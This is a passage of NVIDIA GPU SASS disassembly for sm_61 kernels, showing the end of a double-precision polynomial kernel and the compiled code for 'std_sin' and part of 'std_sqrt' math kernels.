/*01b8*/ DMUL R16, R2, c[0x2][0x0] ; /* 0x4c80000800070210 */
/* 0x011dc844ea621733 */
/*01c8*/ DMUL R14, R8.reuse, R14 ; /* 0x5c80000000e7080e */
/*01d0*/ DMUL R10, R8.reuse, R10 ; /* 0x5c80000000a7080a */
/*01d8*/ DMUL R16, R2, R16 ; /* 0x5c80000001070210 */
/* 0x001e4400fe621230 */
/*01e8*/ { DMUL R18, R8.reuse, R14 ; /* 0x5c80000000e70812 */
/*01f0*/ DEPBAR.LE SB5, 0x1 }
/* 0xf0f0000034170000 */
/*01f8*/ F2F.F64.F32 R4, R4 ; /* 0x5ca8000000470b04 */
/* 0x08444448ee402142 */
/*0208*/ DMUL R14, R8, R10 ; /* 0x5c80000000a7080e */
/*0210*/ DMUL R16, R2.reuse, R16 ; /* 0x5c80000001070210 */
/*0218*/ DMUL R10, R8.reuse, R18 ; /* 0x5c8000000127080a */
/* 0x00914842e6400711 */
/*0228*/ DMUL R20, R2, c[0x2][0x8] ; /* 0x4c80000800270214 */
/*0230*/ DMUL R18, R8.reuse, c[0x2][0x10] ; /* 0x4c80000800470812 */
/*0238*/ DMUL R24, R8, R14 ; /* 0x5c80000000e70818 */
/* 0x083c4448ee408781 */
/*0248*/ DMUL R14, R4, c[0x2][0x0] ; /* 0x4c8000080007040e */
/*0250*/ DMUL R16, R2.reuse, R16 ; /* 0x5c80000001070210 */
/*0258*/ DMUL R20, R2.reuse, R20 ; /* 0x5c80000001470214 */
/* 0x021d4404e6421732 */
/*0268*/ DMUL R18, R8.reuse, R18 ; /* 0x5c80000001270812 */
/*0270*/ DFMA R10, R8, R10, R24 ; /* 0x5b700c0000a7080a */
/*0278*/ DMUL R14, R4, R14 ; /* 0x5c80000000e7040e */
/* 0x083c4c20f2204761 */
/*0288*/ DMUL R16, R2, R16 ; /* 0x5c80000001070210 */
/*0290*/ F2F.F64.F32 R6, R6 ; /* 0x5ca8000000670b06 */
/*0298*/ DMUL R20, R2.reuse, R20 ; /* 0x5c80000001470214 */
/* 0x011dc404ea201732 */
/*02a8*/ DFMA R10, R8, R18, R10 ; /* 0x5b7005000127080a */
/*02b0*/ DMUL R14, R4, R14 ; /* 0x5c80000000e7040e */
/*02b8*/ DMUL R16, R2, R16 ; /* 0x5c80000001070210 */
/* 0x00444841e2608781 */
/*02c8*/ DMUL R24, R6, c[0x2][0x0] ; /* 0x4c80000800070618 */
/*02d0*/ DMUL R20, R2.reuse, R20 ; /* 0x5c80000001470214 */
/*02d8*/ DADD R8, R8, R10 ; /* 0x5c70000000a70808 */
/* 0x005cc44862222751 */
/*02e8*/ DMUL R14, R4.reuse, R14 ; /* 0x5c80000000e7040e */
/*02f0*/ DMUL R18, R2.reuse, R16 ; /* 0x5c80000001070212 */
/*02f8*/ DMUL R10, R4, c[0x2][0x8] ; /* 0x4c8000080027040a */
/* 0x003c4810f2404761 */
/*0308*/ DMUL R16, R2, c[0x2][0x10] ; /* 0x4c80000800470210 */
/*0310*/ DMUL R24, R6, R24 ; /* 0x5c80000001870618 */
/*0318*/ DADD R8, R8, R26 ; /* 0x5c70000001a70808 */
/* 0x005cc440e2222751 */
/*0328*/ DMUL R14, R4.reuse, R14 ; /* 0x5c80000000e7040e */
/*0330*/ DFMA R20, R2.reuse, R20, R18 ; /* 0x5b70090001470214 */
/*0338*/ DMUL R10, R4, R10 ; /* 0x5c80000000a7040a */
/* 0x00204850f2404761 */
/*0348*/ DMUL R16, R2, R16 ; /* 0x5c80000001070210 */
/*0350*/ DMUL R24, R6.reuse, R24 ; /* 0x5c80000001870618 */
/*0358*/ F2F.F32.F64 R13, R8 ; /* 0x5ca8000000870e0d */
/* 0x011dc402e6222752 */
/*0368*/ DMUL R14, R4.reuse, R14 ; /* 0x5c80000000e7040e */
/*0370*/ DMUL R10, R4, R10 ; /* 0x5c80000000a7040a */
/*0378*/ DFMA R16, R2, R16, R20 ; /* 0x5b700a0001070210 */
/* 0x08884810f2600f01 */
/*0388*/ DMUL R8, R6, c[0x2][0x8] ; /* 0x4c80000800270608 */
/*0390*/ DMUL R24, R6, R24 ; /* 0x5c80000001870618 */
/*0398*/ DMUL R18, R4.reuse, R14 ; /* 0x5c80000000e70412 */
/* 0x010c4804ea221731 */
/*03a8*/ DMUL R10, R4.reuse, R10 ; /* 0x5c80000000a7040a */
/*03b0*/ DMUL R14, R4, c[0x2][0x10] ; /* 0x4c8000080047040e */
/*03b8*/ DADD R16, R2, R16 ; /* 0x5c70000001070210 */
/* 0x0a1e4841e2204761 */
/*03c8*/ F2F.F64.F32 R2, R13 ; /* 0x5ca8000000d70b02 */
/*03d0*/ DMUL R8, R6.reuse, R8 ; /* 0x5c80000000870608 */
/*03d8*/ DMUL R24, R6.reuse, R24 ; /* 0x5c80000001870618 */
/* 0x011d4404e6621731 */
/*03e8*/ DFMA R10, R4.reuse, R10, R18 ; /* 0x5b70090000a7040a */
/*03f0*/ DMUL R14, R4, R14 ; /* 0x5c80000000e7040e */
/*03f8*/ DADD R2, R16, R2 ; /* 0x5c70000000271002 */
/* 0x005ccc50ee600f01 */
/*0408*/ DMUL R8, R6, R8 ; /* 0x5c80000000870608 */
/*0410*/ DMUL R24, R6.reuse, R24 ; /* 0x5c80000001870618 */
/*0418*/ DFMA R10, R4, R14, R10 ; /* 0x5b70050000e7040a */
/* 0x091c4441e2202751 */
/*0428*/ F2F.F32.F64 R2, R2 ; /* 0x5ca8000000270e02 */
/*0430*/ DMUL R8, R6.reuse, R8 ; /* 0x5c80000000870608 */
/*0438*/ DMUL R24, R6.reuse, R24 ; /* 0x5c80000001870618 */
/* 0x009cc80246600762 */
/*0448*/ DMUL R16, R6, c[0x2][0x10] ; /* 0x4c80000800470610 */
/*0450*/ DADD R10, R4, R10 ; /* 0x5c70000000a7040a */
/*0458*/ F2F.F64.F32 R4, R2 ; /* 0x5ca8000000270b04 */
/* 0x005cc848e2c20f11 */
/*0468*/ DFMA R8, R6.reuse, R8, R24 ; /* 0x5b700c0000870608 */
/*0470*/ DMUL R16, R6.reuse, R16 ; /* 0x5c80000001070610 */
/*0478*/ DADD R4, R10, R4 ; /* 0x5c70000000470a04 */
/* 0x003c5802e4400f16 */
/*0488*/ DFMA R8, R6, R16, R8 ; /* 0x5b70040001070608 */
/*0490*/ F2F.F32.F64 R2, R4 ; /* 0x5ca8000000470e02 */
/*0498*/ DADD R8, R6, R8 ; /* 0x5c70000000870608 */
/* 0x0020c001e3c0171e */
/*04a8*/ F2F.F64.F32 R2, R2 ; /* 0x5ca8000000270b02 */
/*04b0*/ DADD R2, R8, R2 ; /* 0x5c70000000270802 */
/*04b8*/ { F2F.F32.F64 R13, R2 ; /* 0x5ca8000000270e0d */
/* 0x001f9841fe2007fe */
/*04c8*/ @P0 BRA 0x60 }
/* 0xe2400fffb900000f */
/*04d0*/ SHR R3, R0.reuse, 0x1e ; /* 0x3829000001e70003 */
/*04d8*/ ISCADD R2.CC, R0, c[0x0][0x150], 0x2 ; /* 0x4c18810005470002 */
/* 0x001ffc02fea007e2 */
/*04e8*/ IADD.X R3, R3, c[0x0][0x154] ; /* 0x4c10080005570303 */
/*04f0*/ STG.E [R2], R13 ; /* 0xeedc20000007020d */
/*04f8*/ EXIT ; /* 0xe30000000007000f */
/* 0x001f8000fc0007ff */
/*0508*/ BRA 0x500 ; /* 0xe2400fffff07000f */
/*0510*/ NOP; /* 0x50b0000000070f00 */
/*0518*/ NOP; /* 0x50b0000000070f00 */
/* 0x001f8000fc0007e0 */
/*0528*/ NOP; /* 0x50b0000000070f00 */
/*0530*/ NOP; /* 0x50b0000000070f00 */
/*0538*/ NOP; /* 0x50b0000000070f00 */
...............................
Function : _Z7std_sinPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001fc400fe2007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ IADD32I R1, R1, -0x20 ; /* 0x1c0ffffffe070101 */
/*0018*/ MOV R2, RZ ; /* 0x5c9807800ff70002 */
/* 0x001c4400fec007f4 */
/*0028*/ MOV R3, RZ ; /* 0x5c9807800ff70003 */
/*0030*/ IADD R11, R1, c[0x0][0x4] ; /* 0x4c1000000017010b */
/*0038*/ S2R R4, SR_CTAID.X ; /* 0xf0c8000002570004 */
/* 0x001fc441fe00073f */
/*0048*/ S2R R5, SR_TID.X ; /* 0xf0c8000002170005 */
/*0050*/ { XMAD.MRG R6, R4.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270406 */
/*0058*/ SSY 0x490 }
/* 0xe290000043000000 */
/* 0x001fd800fcc017e6 */
/*0068*/ XMAD R5, R4, c[0x0] [0x8], R5 ; /* 0x4e00028000270405 */
/*0070*/ XMAD.PSL.CBCC R4, R4.H1, R6.H1, R5 ; /* 0x5b30029800670404 */
/*0078*/ IADD R6, R4, R3 ; /* 0x5c10000000370406 */
/* 0x001f8800fcc207f1 */
/*0088*/ SHR.U32 R0, R6.reuse, 0x1e ; /* 0x3828000001e70600 */
/*0090*/ ISCADD R6.CC, R6, c[0x0][0x140], 0x2 ; /* 0x4c18810005070606 */
/*0098*/ IADD.X R7, R0, c[0x0][0x144] ; /* 0x4c10080005170007 */
/* 0x041fb400fe8007b1 */
/*00a8*/ LDG.E R5, [R6] ; /* 0xeed4200000070605 */
/*00b0*/ IADD32I R3, R3, 0x1 ; /* 0x1c00000000170303 */
/*00b8*/ FSETP.NEU.AND P0, PT, |R5|, +INF , PT ; /* 0x36bd03ff80070587 */
/* 0x001c4400fc4007e6 */
/*00c8*/ @!P0 FMUL R5, RZ, R5 ; /* 0x5c6800000058ff05 */
/*00d0*/ FMUL32I R0, R5, 0.63661974668502807617 ; /* 0x1e03f22f98370500 */
/*00d8*/ F2I.S32.F32 R0, R0 ; /* 0x5cb0000000071a00 */
/* 0x001f8401e22007e1 */
/*00e8*/ FSETP.GT.AND P1, PT, |R5|, c[0x2][0xc], PT ; /* 0x4bb403880037058f */
/*00f0*/ I2F.F32.S32 R8, R0 ; /* 0x5cb8000000072a08 */
/*00f8*/ ISETP.GE.U32.AND P0, PT, R3, 0x100, PT ; /* 0x366c038010070307 */
/* 0x001fc000fcc00fe6 */
/*0108*/ FFMA R9, R8, -c[0x2][0x0], R5 ; /* 0x4981028800070809 */
/*0110*/ FFMA R9, R8, -c[0x2][0x4], R9 ; /* 0x4981048800170809 */
/*0118*/ { FFMA R8, R8, -c[0x2][0x8], R9 ; /* 0x4981048800270808 */
/* 0x001fc400fe2007fd */
/*0128*/ @!P1 SYNC }
/* 0xf0f800000009000f */
/*0130*/ SHL R6, R5, 0x8 ; /* 0x3848000000870506 */
/*0138*/ MOV R0, R1 ; /* 0x5c98078000170000 */
/* 0x001fc800fe2007f1 */
/*0148*/ MOV R7, RZ ; /* 0x5c9807800ff70007 */
/*0150*/ MOV R14, RZ ; /* 0x5c9807800ff7000e */
/*0158*/ MOV32I R8, 0xfffffffa ; /* 0x010fffffffa7f008 */
/* 0x0000d800fe0007e6 */
/*0168*/ LOP32I.OR R16, R6, 0x80000000 ; /* 0x0428000000070610 */
/*0170*/ { IADD32I R8, R8, 0x1 ; /* 0x1c00000000170808 */
/*0178*/ LDC R6, c[0x3][R14] }
/* 0xef94003000070e06 */
/* 0x185fc401fe2007f1 */
/*0188*/ ISETP.NE.AND P1, PT, R8, RZ, PT ; /* 0x5b6b03800ff7080f */
/*0190*/ IADD32I R14, R14, 0x4 ; /* 0x1c00000000470e0e */
/*0198*/ XMAD R9, R6.reuse, R16.reuse, RZ ; /* 0x5b007f8001070609 */
/* 0x181fcc00fc2607f1 */
/*01a8*/ XMAD.MRG R12, R6.reuse, R16.H1.reuse, RZ ; /* 0x5b007fa80107060c */
/*01b0*/ XMAD R10, R6, R16.H1, RZ ; /* 0x5b007f880107060a */
/*01b8*/ XMAD R13, R6.H1.reuse, R16.H1.reuse, RZ ; /* 0x5b207f880107060d */
/* 0x001fc400feaa07f1 */
/*01c8*/ XMAD.CHI R15, R6.H1.reuse, R16, R9.reuse ; /* 0x5b2804800107060f */
/*01d0*/ XMAD.PSL.CBCC R6, R6.H1, R12.H1, R9 ; /* 0x5b30049800c70606 */
/*01d8*/ IADD3.RS R10, R15, R10, R13 ; /* 0x5cc006a000a70f0a */
/* 0x001ff4001ee007f6 */
/*01e8*/ IADD R6.CC, R7, R6 ; /* 0x5c10800000670706 */
/*01f0*/ STL [R0], R6 ; /* 0xef54000000070006 */
/*01f8*/ IADD.X R7, RZ, R10 ; /* 0x5c10080000a7ff07 */
/* 0x081fc400ffa00ff0 */
/*0208*/ { IADD32I R0, R0, 0x4 ; /* 0x1c00000000470000 */
/*0210*/ @P1 BRA 0x170 }
/* 0xe2400ffff581000f */
/*0218*/ BFE.U32 R0, R5.reuse, 0x817 ; /* 0x3800000081770500 */
/* 0x001fd400fe2007e5 */
/*0228*/ BFE.U32 R15, R5, 0x517 ; /* 0x380000005177050f */
/*0230*/ IADD32I R0, R0, -0x80 ; /* 0x1c0ffffff8070000 */
/*0238*/ ISETP.NE.AND P1, PT, R15, RZ, PT ; /* 0x5b6b03800ff70f0f */
/* 0x001fc000fca007e1 */
/*0248*/ SHR.U32 R0, R0, 0x5 ; /* 0x3828000000570000 */
/*0250*/ IADD R13, R11, -c[0x0][0x4] ; /* 0x4c11000000170b0d */
/*0258*/ { IADD32I R0, -R0, 0x6 ; /* 0x1d00000000670000 */
/* 0x001ec400fc4007f6 */
/*0268*/ STL [R13+0x18], R7 }
/* 0xef54000001870d07 */
/*0270*/ LEA R14, R0, R13, 0x2 ; /* 0x5bd7010000d7000e */
/*0278*/ @P1 LDL R10, [R14+-0x8] ; /* 0xef440fffff810e0a */
/* 0x001ff400162007b1 */
/*0288*/ LDL R0, [R14] ; /* 0xef44000000070e00 */
/*0290*/ LDL R6, [R14+-0x4] ; /* 0xef440fffffc70e06 */
/*0298*/ @P1 IADD32I R8, -R15, 0x20 ; /* 0x1d00000002010f08 */
/* 0x001f8420fe200ff1 */
/*02a8*/ MOV32I R14, 0xc90fdaa2 ; /* 0x010c90fdaa27f00e */
/*02b0*/ @P1 SHR.U32 R10, R10, R8 ; /* 0x5c28000000810a0a */
/*02b8*/ @P1 SHL R9, R0, R15 ; /* 0x5c48000000f10009 */
/* 0x001f8400fca007f1 */
/*02c8*/ @P1 SHR.U32 R8, R6, R8 ; /* 0x5c28000000810608 */
/*02d0*/ @P1 SHL R12, R6, R15 ; /* 0x5c48000000f1060c */
/*02d8*/ @P1 IADD R0, R8, R9 ; /* 0x5c10000000910800 */
/* 0x001fd800fec007f6 */
/*02e8*/ @P1 IADD R6, R10, R12 ; /* 0x5c10000000c10a06 */
/*02f0*/ SHF.L R12, R6, 0x2, R0 ; /* 0x36f800000027060c */
/*02f8*/ SHR.U32 R7, R12, 0x1f ; /* 0x3828000001f70c07 */
/* 0x001fc400fd8007f1 */
/*0308*/ ISETP.NE.AND P1, PT, R7, RZ, PT ; /* 0x5b6b03800ff7070f */
/*0310*/ SHL R9, R6, 0x2 ; /* 0x3848000000270609 */
/*0318*/ @P1 LOP.PASS_B R6, RZ, ~R12 ; /* 0x5c47070000c1ff06 */
/* 0x001c4400fc4007e6 */
/*0328*/ @P1 ICMP.NE R8, RZ, 0x1, R9 ; /* 0x364b04800011ff08 */
/*0330*/ @P1 IADD R12, R6, R8 ; /* 0x5c1000000081060c */
/*0338*/ FLO.U32 R8, R12 ; /* 0x5c30000000c70008 */
/* 0x003fd800ffa007e1 */
/*0348*/ @P1 IADD R6, -R9, RZ ; /* 0x5c1200000ff10906 */
/*0350*/ @!P1 MOV R6, R9 ; /* 0x5c98078000990006 */
/*0358*/ IADD32I R10, -R8, 0x1f ; /* 0x1d00000001f7080a */
/* 0x001fd400fe2007e1 */
/*0368*/ ISETP.EQ.AND P2, PT, R10, RZ, PT ; /* 0x5b6503800ff70a17 */
/*0370*/ IADD32I R9, -R10, 0x20 ; /* 0x1d00000002070a09 */
/*0378*/ SHL R8, R12, R10 ; /* 0x5c48000000a70c08 */
/* 0x001f8400fcc007e6 */
/*0388*/ SHR.U32 R6, R6, R9 ; /* 0x5c28000000970606 */
/*0390*/ @!P2 IADD R12, R8, R6 ; /* 0x5c100000006a080c */
/*0398*/ XMAD R9, R12, R14, RZ ; /* 0x5b007f8000e70c09 */
/* 0x001fd800fc8007e1 */
/*03a8*/ XMAD R6, R12, R14.H1, RZ ; /* 0x5b007f8800e70c06 */
/*03b0*/ XMAD R8, R12.H1, R14.H1, RZ ; /* 0x5b207f8800e70c08 */
/*03b8*/ XMAD.CHI R13, R12.H1, R14, R9 ; /* 0x5b28048000e70c0d */
/* 0x001ff400fda007f6 */
/*03c8*/ IADD3.RS R6, R13, R6, R8 ; /* 0x5cc0042000670d06 */
/*03d0*/ ISETP.GE.AND P2, PT, R6, 0x1, PT ; /* 0x366d038000170617 */
/*03d8*/ @P2 XMAD.MRG R14, R12, R14.H1, RZ ; /* 0x5b007fa800e20c0e */
/* 0x001f8400fcc007f6 */
/*03e8*/ @P2 XMAD.PSL.CBCC R8, R12.H1, R14.H1, R9 ; /* 0x5b30049800e20c08 */
/*03f0*/ @P2 SHF.L R6, R8, 0x1, R6 ; /* 0x36f8030000120806 */
/*03f8*/ IADD32I R6, R6, 0x1 ; /* 0x1c00000000170606 */
/* 0x001fc400fc2007f5 */
/*0408*/ @P2 IADD32I R10, R10, 0x1 ; /* 0x1c00000000120a0a */
/*0410*/ LEA.HI R6, R6, c[0x2][0x10], RZ, 0x19 ; /* 0x18cf7f8800470606 */
/*0418*/ LOP32I.AND R12, R5, 0x80000000 ; /* 0x040800000007050c */
/* 0x001f8400fe6007e1 */
/*0428*/ LEA.HI R7, R0, R7, RZ, 0x2 ; /* 0x5bdf7f8020770007 */
/*0430*/ IADD32I R10, -R10, 0x7e ; /* 0x1d00000007e70a0a */
/*0438*/ SHR.U32 R0, R6, 0x1 ; /* 0x3828000000170600 */
/* 0x001fcc00fc2007e1 */
/*0448*/ @P1 LOP32I.XOR R8, R12, 0x80000000 ; /* 0x0448000000010c08 */
/*0450*/ IADD R5, -R7, RZ ; /* 0x5c1200000ff70705 */
/*0458*/ @!P1 MOV R8, R12 ; /* 0x5c98078000c90008 */
/* 0x001fc000fc8007f2 */
/*0468*/ ISCADD R10, R10, R0, 0x17 ; /* 0x5c180b8000070a0a */
/*0470*/ ICMP.EQ R0, R7, R5, R12 ; /* 0x5b45060000570700 */
/*0478*/ { LOP.OR R8, R10, R8 ; /* 0x5c47020000870a08 */
/* 0x001fc440fe2007fd */
/*0488*/ SYNC }
/* 0xf0f800000007000f */
/*0490*/ LOP32I.AND R5, R0.reuse, 0x1 ; /* 0x0400000000170005 */
/*0498*/ FMUL R7, R8, R8 ; /* 0x5c68000000870807 */
/* 0x001fc400fda007f4 */
/*04a8*/ LOP.AND.NZ P1, RZ, R0, 0x2 ; /* 0x38413000002700ff */
/*04b0*/ ISETP.NE.AND P2, PT, R5, RZ, PT ; /* 0x5b6b03800ff70517 */
/*04b8*/ @P2 MOV32I R5, 0x3ab6061a ; /* 0x0103ab6061a2f005 */
/* 0x001fd400fc2007f5 */
/*04c8*/ @!P2 MOV32I R6, 0x3c08839e ; /* 0x0103c08839eaf006 */
/*04d0*/ @P2 FFMA R5, R7, c[0x2][0x14], -R5 ; /* 0x4982028800520705 */
/*04d8*/ @!P2 FFMA R5, R7, c[0x2][0x18], R6 ; /* 0x49800308006a0705 */
/* 0x001fc400fea007f1 */
/*04e8*/ @P2 FFMA R6, R7, R5, c[0x2][0x1c] ; /* 0x5180028800720706 */
/*04f0*/ @!P2 FFMA R5, R7, R5, c[0x2][0x24] ; /* 0x51800288009a0705 */
/*04f8*/ @P2 FFMA R6, R7, R6, c[0x2][0x20] ; /* 0x5180030800820706 */
/* 0x001ff400fc2007f6 */
/*0508*/ @!P2 FFMA R6, R7, R5, RZ ; /* 0x59807f80005a0706 */
/*0510*/ FFMA R8, R6, R8, R8 ; /* 0x5980040000870608 */
/*0518*/ @P2 FFMA R8, R7, R6, c[0x2][0x28] ; /* 0x5180030800a20708 */
/* 0x001ff400fe0007f6 */
/*0528*/ @P1 FFMA R8, R8, -1, RZ ; /* 0x33807fbf80010808 */
/*0530*/ { FADD R2, R8, R2 ; /* 0x5c58000000270802 */
/*0538*/ @!P0 BRA 0x38 }
/* 0xe2400fffaf88000f */
/* 0x001f8800fcc207f1 */
/*0548*/ SHR R0, R4.reuse, 0x1e ; /* 0x3829000001e70400 */
/*0550*/ ISCADD R4.CC, R4, c[0x0][0x150], 0x2 ; /* 0x4c18810005470404 */
/*0558*/ IADD.X R5, R0, c[0x0][0x154] ; /* 0x4c10080005570005 */
/* 0x001ffc00ffe007f5 */
/*0568*/ STG.E [R4], R2 ; /* 0xeedc200000070402 */
/*0570*/ EXIT ; /* 0xe30000000007000f */
/*0578*/ BRA 0x578 ; /* 0xe2400fffff87000f */
..............................
Function : _Z8std_sqrtPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV R4, RZ ; /* 0x5c9807800ff70004 */
/*0018*/ S2R R0, SR_CTAID.X }
/* 0xf0c8000002570000 */
/* 0x085fd841fe20073f */
/*0028*/ S2R R2, SR_TID.X ; /* 0xf0c8000002170002 */
/*0030*/ XMAD.MRG R3, R0.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270003 */
/*0038*/ XMAD R2, R0.reuse, c[0x0] [0x8], R2 ; /* 0x4e00010000270002 */
/* 0x001f9800fea007f1 */
/*0048*/ XMAD.PSL.CBCC R0, R0.H1, R3.H1, R2 ; /* 0x5b30011800370000 */
/*0050*/ MOV32I R2, 0xffffff00 ; /* 0x010ffffff007f002 */
/*0058*/ MOV R3, R0 ; /* 0x5c98078000070003 */
/* 0x001f9800fe2207f0 */
/*0068*/ { SHR.U32 R5, R3.reuse, 0x1e ; /* 0x3828000001e70305 */
/*0070*/ SSY 0x138 }
/* 0xe29000000c000000 */
/*0078*/ ISCADD R6.CC, R3, c[0x0][0x140], 0x2 ; /* 0x4c18810005070306 */
/* 0x001fd800f62007e2 */
/*0088*/ IADD.X R7, R5, c[0x0][0x144] ; /* 0x4c10080005170507 */
/*0090*/ LDG.E R10, [R6] ; /* 0xeed420000007060a */
/*0098*/ IADD32I R2, R2, 0x10 ; /* 0x1c00000001070202 */
/* 0x001fb420fec007ed */
/*00a8*/ ISETP.NE.AND P0, PT, R2, RZ, PT ; /* 0x5b6b03800ff70207 */
/*00b0*/ IADD32I R5, R10, -0xd000000 ; /* 0x1c0f300000070a05 */
/*00b8*/ ISETP.GT.U32.AND P1, PT, R5, c[0x2][0x0], PT ; /* 0x4b6803880007050f */
/* 0x001fc000ffa007fd */
/*00c8*/ @!P1 BRA 0xf0 ; /* 0xe24000000209000f */
/*00d0*/ CAL 0xd78 ; /* 0xe2600000ca000040 */
/*00d8*/ { MOV R5, R6 ; /* 0x5c98078000670005 */
/* 0x003fc400e3a007fd */
/*00e8*/ SYNC }
/* 0xf0f800000007000f */
/*00f0*/ MUFU.RSQ R5, R10 ; /* 0x5080000000570a05 */
/*00f8*/ FMUL.FTZ R6, R10, R5 ; /* 0x5c68100000570a06 */
/* 0x001fd840fec007f5 */
/*0108*/ FMUL.FTZ R5, R5, 0.5 ; /* 0x3868103f00070505 */
/*0110*/ FADD.FTZ R7, -R6.reuse, -RZ ; /* 0x5c5930000ff70607 */
/*0118*/ FFMA R7, R6, R7, R10 ; /* 0x5980050000770607 */
/* 0x001fc000ffa007f0 */
/*0128*/ { FFMA R5, R7, R5, R6 ; /* 0x5980030000570705 */
/*0130*/ SYNC }
/* 0xf0f800000007000f */
/*0138*/ { IADD32I R6, R3, 0x1 ; /* 0x1c00000000170306 */
/* 0x001f9840fe2007f6 */
/*0148*/ SSY 0x200 }
/* 0xe29000000b000000 */
/*0150*/ SHR.U32 R7, R6.reuse, 0x1e ; /* 0x3828000001e70607 */
/*0158*/ ISCADD R6.CC, R6, c[0x0][0x140], 0x2 ; /* 0x4c18810005070606 */
/* 0x001f9000f62007e2 */
/*0168*/ IADD.X R7, R7, c[0x0][0x144] ; /* 0x4c10080005170707 */
/*0170*/ LDG.E R10, [R6] ; /* 0xeed420000007060a */
/*0178*/ FADD R11, R5, R4 ; /* 0x5c5800000047050b */
/* 0x001ff400fda107f6 */
/*0188*/ IADD32I R8, R10, -0xd000000 ; /* 0x1c0f300000070a08 */
/*0190*/ ISETP.GT.U32.AND P1, PT, R8, c[0x2][0x0], PT ; /* 0x4b6803880007080f */
/*0198*/ @!P1 BRA 0x1b8 ; /* 0xe24000000189000f */
/* 0x001c7400ffa007fd */
/*01a8*/ CAL 0xd78 ; /* 0xe2600000bc800040 */
/*01b0*/ SYNC ; /* 0xf0f800000007000f */
/*01b8*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/* 0x081fd800fea00ff1 */
/*01c8*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*01d0*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*01d8*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/* 0x001ff400fe0007f6 */
/*01e8*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*01f0*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*01f8*/ SYNC }
/* 0xf0f800000007000f */
/* 0x081fc400fec007f0 */
/*0208*/ { IADD32I R4, R3, 0x2 ; /* 0x1c00000000270304 */
/*0210*/ SSY 0x2d0 }
/* 0xe29000000b800000 */
/*0218*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/* 0x001ec400fc4007e6 */
/*0228*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0230*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0238*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/* 0x001fb420fec007e4 */
/*0248*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0250*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*0258*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/* 0x001ff400ffa007fd */
/*0268*/ @!P1 BRA 0x280 ; /* 0xe24000000109000f */
/*0270*/ CAL 0xd78 ; /* 0xe2600000b0000040 */
/*0278*/ SYNC ; /* 0xf0f800000007000f */
/* 0x001fd401fe20071d */
/*0288*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*0290*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*0298*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/* 0x001fc000fec207f6 */
/*02a8*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*02b0*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*02b8*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/* 0x001fd800fe0007fd */
/*02c8*/ SYNC }
/* 0xf0f800000007000f */
/*02d0*/ { IADD32I R4, R3, 0x3 ; /* 0x1c00000000370304 */
/*02d8*/ SSY 0x398 }
/* 0xe29000000b800000 */
/* 0x001f8800fcc207f1 */
/*02e8*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*02f0*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*02f8*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/* 0x041fd800fc8007b1 */
/*0308*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0310*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0318*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/* 0x001ff400ffa007ed */
/*0328*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*0330*/ @!P1 BRA 0x350 ; /* 0xe24000000189000f */
/*0338*/ CAL 0xd78 ; /* 0xe2600000a3800040 */
/* 0x003fc400e3a007fd */
/*0348*/ SYNC ; /* 0xf0f800000007000f */
/*0350*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*0358*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/* 0x001fd840fec007f5 */
/*0368*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0370*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*0378*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/* 0x001fc000ffa007f0 */
/*0388*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*0390*/ SYNC }
/* 0xf0f800000007000f */
/*0398*/ { IADD32I R4, R3, 0x4 ; /* 0x1c00000000470304 */
/* 0x001f9840fe2007f6 */
/*03a8*/ SSY 0x460 }
/* 0xe29000000b000000 */
/*03b0*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*03b8*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/* 0x001f9000f62007e2 */
/*03c8*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
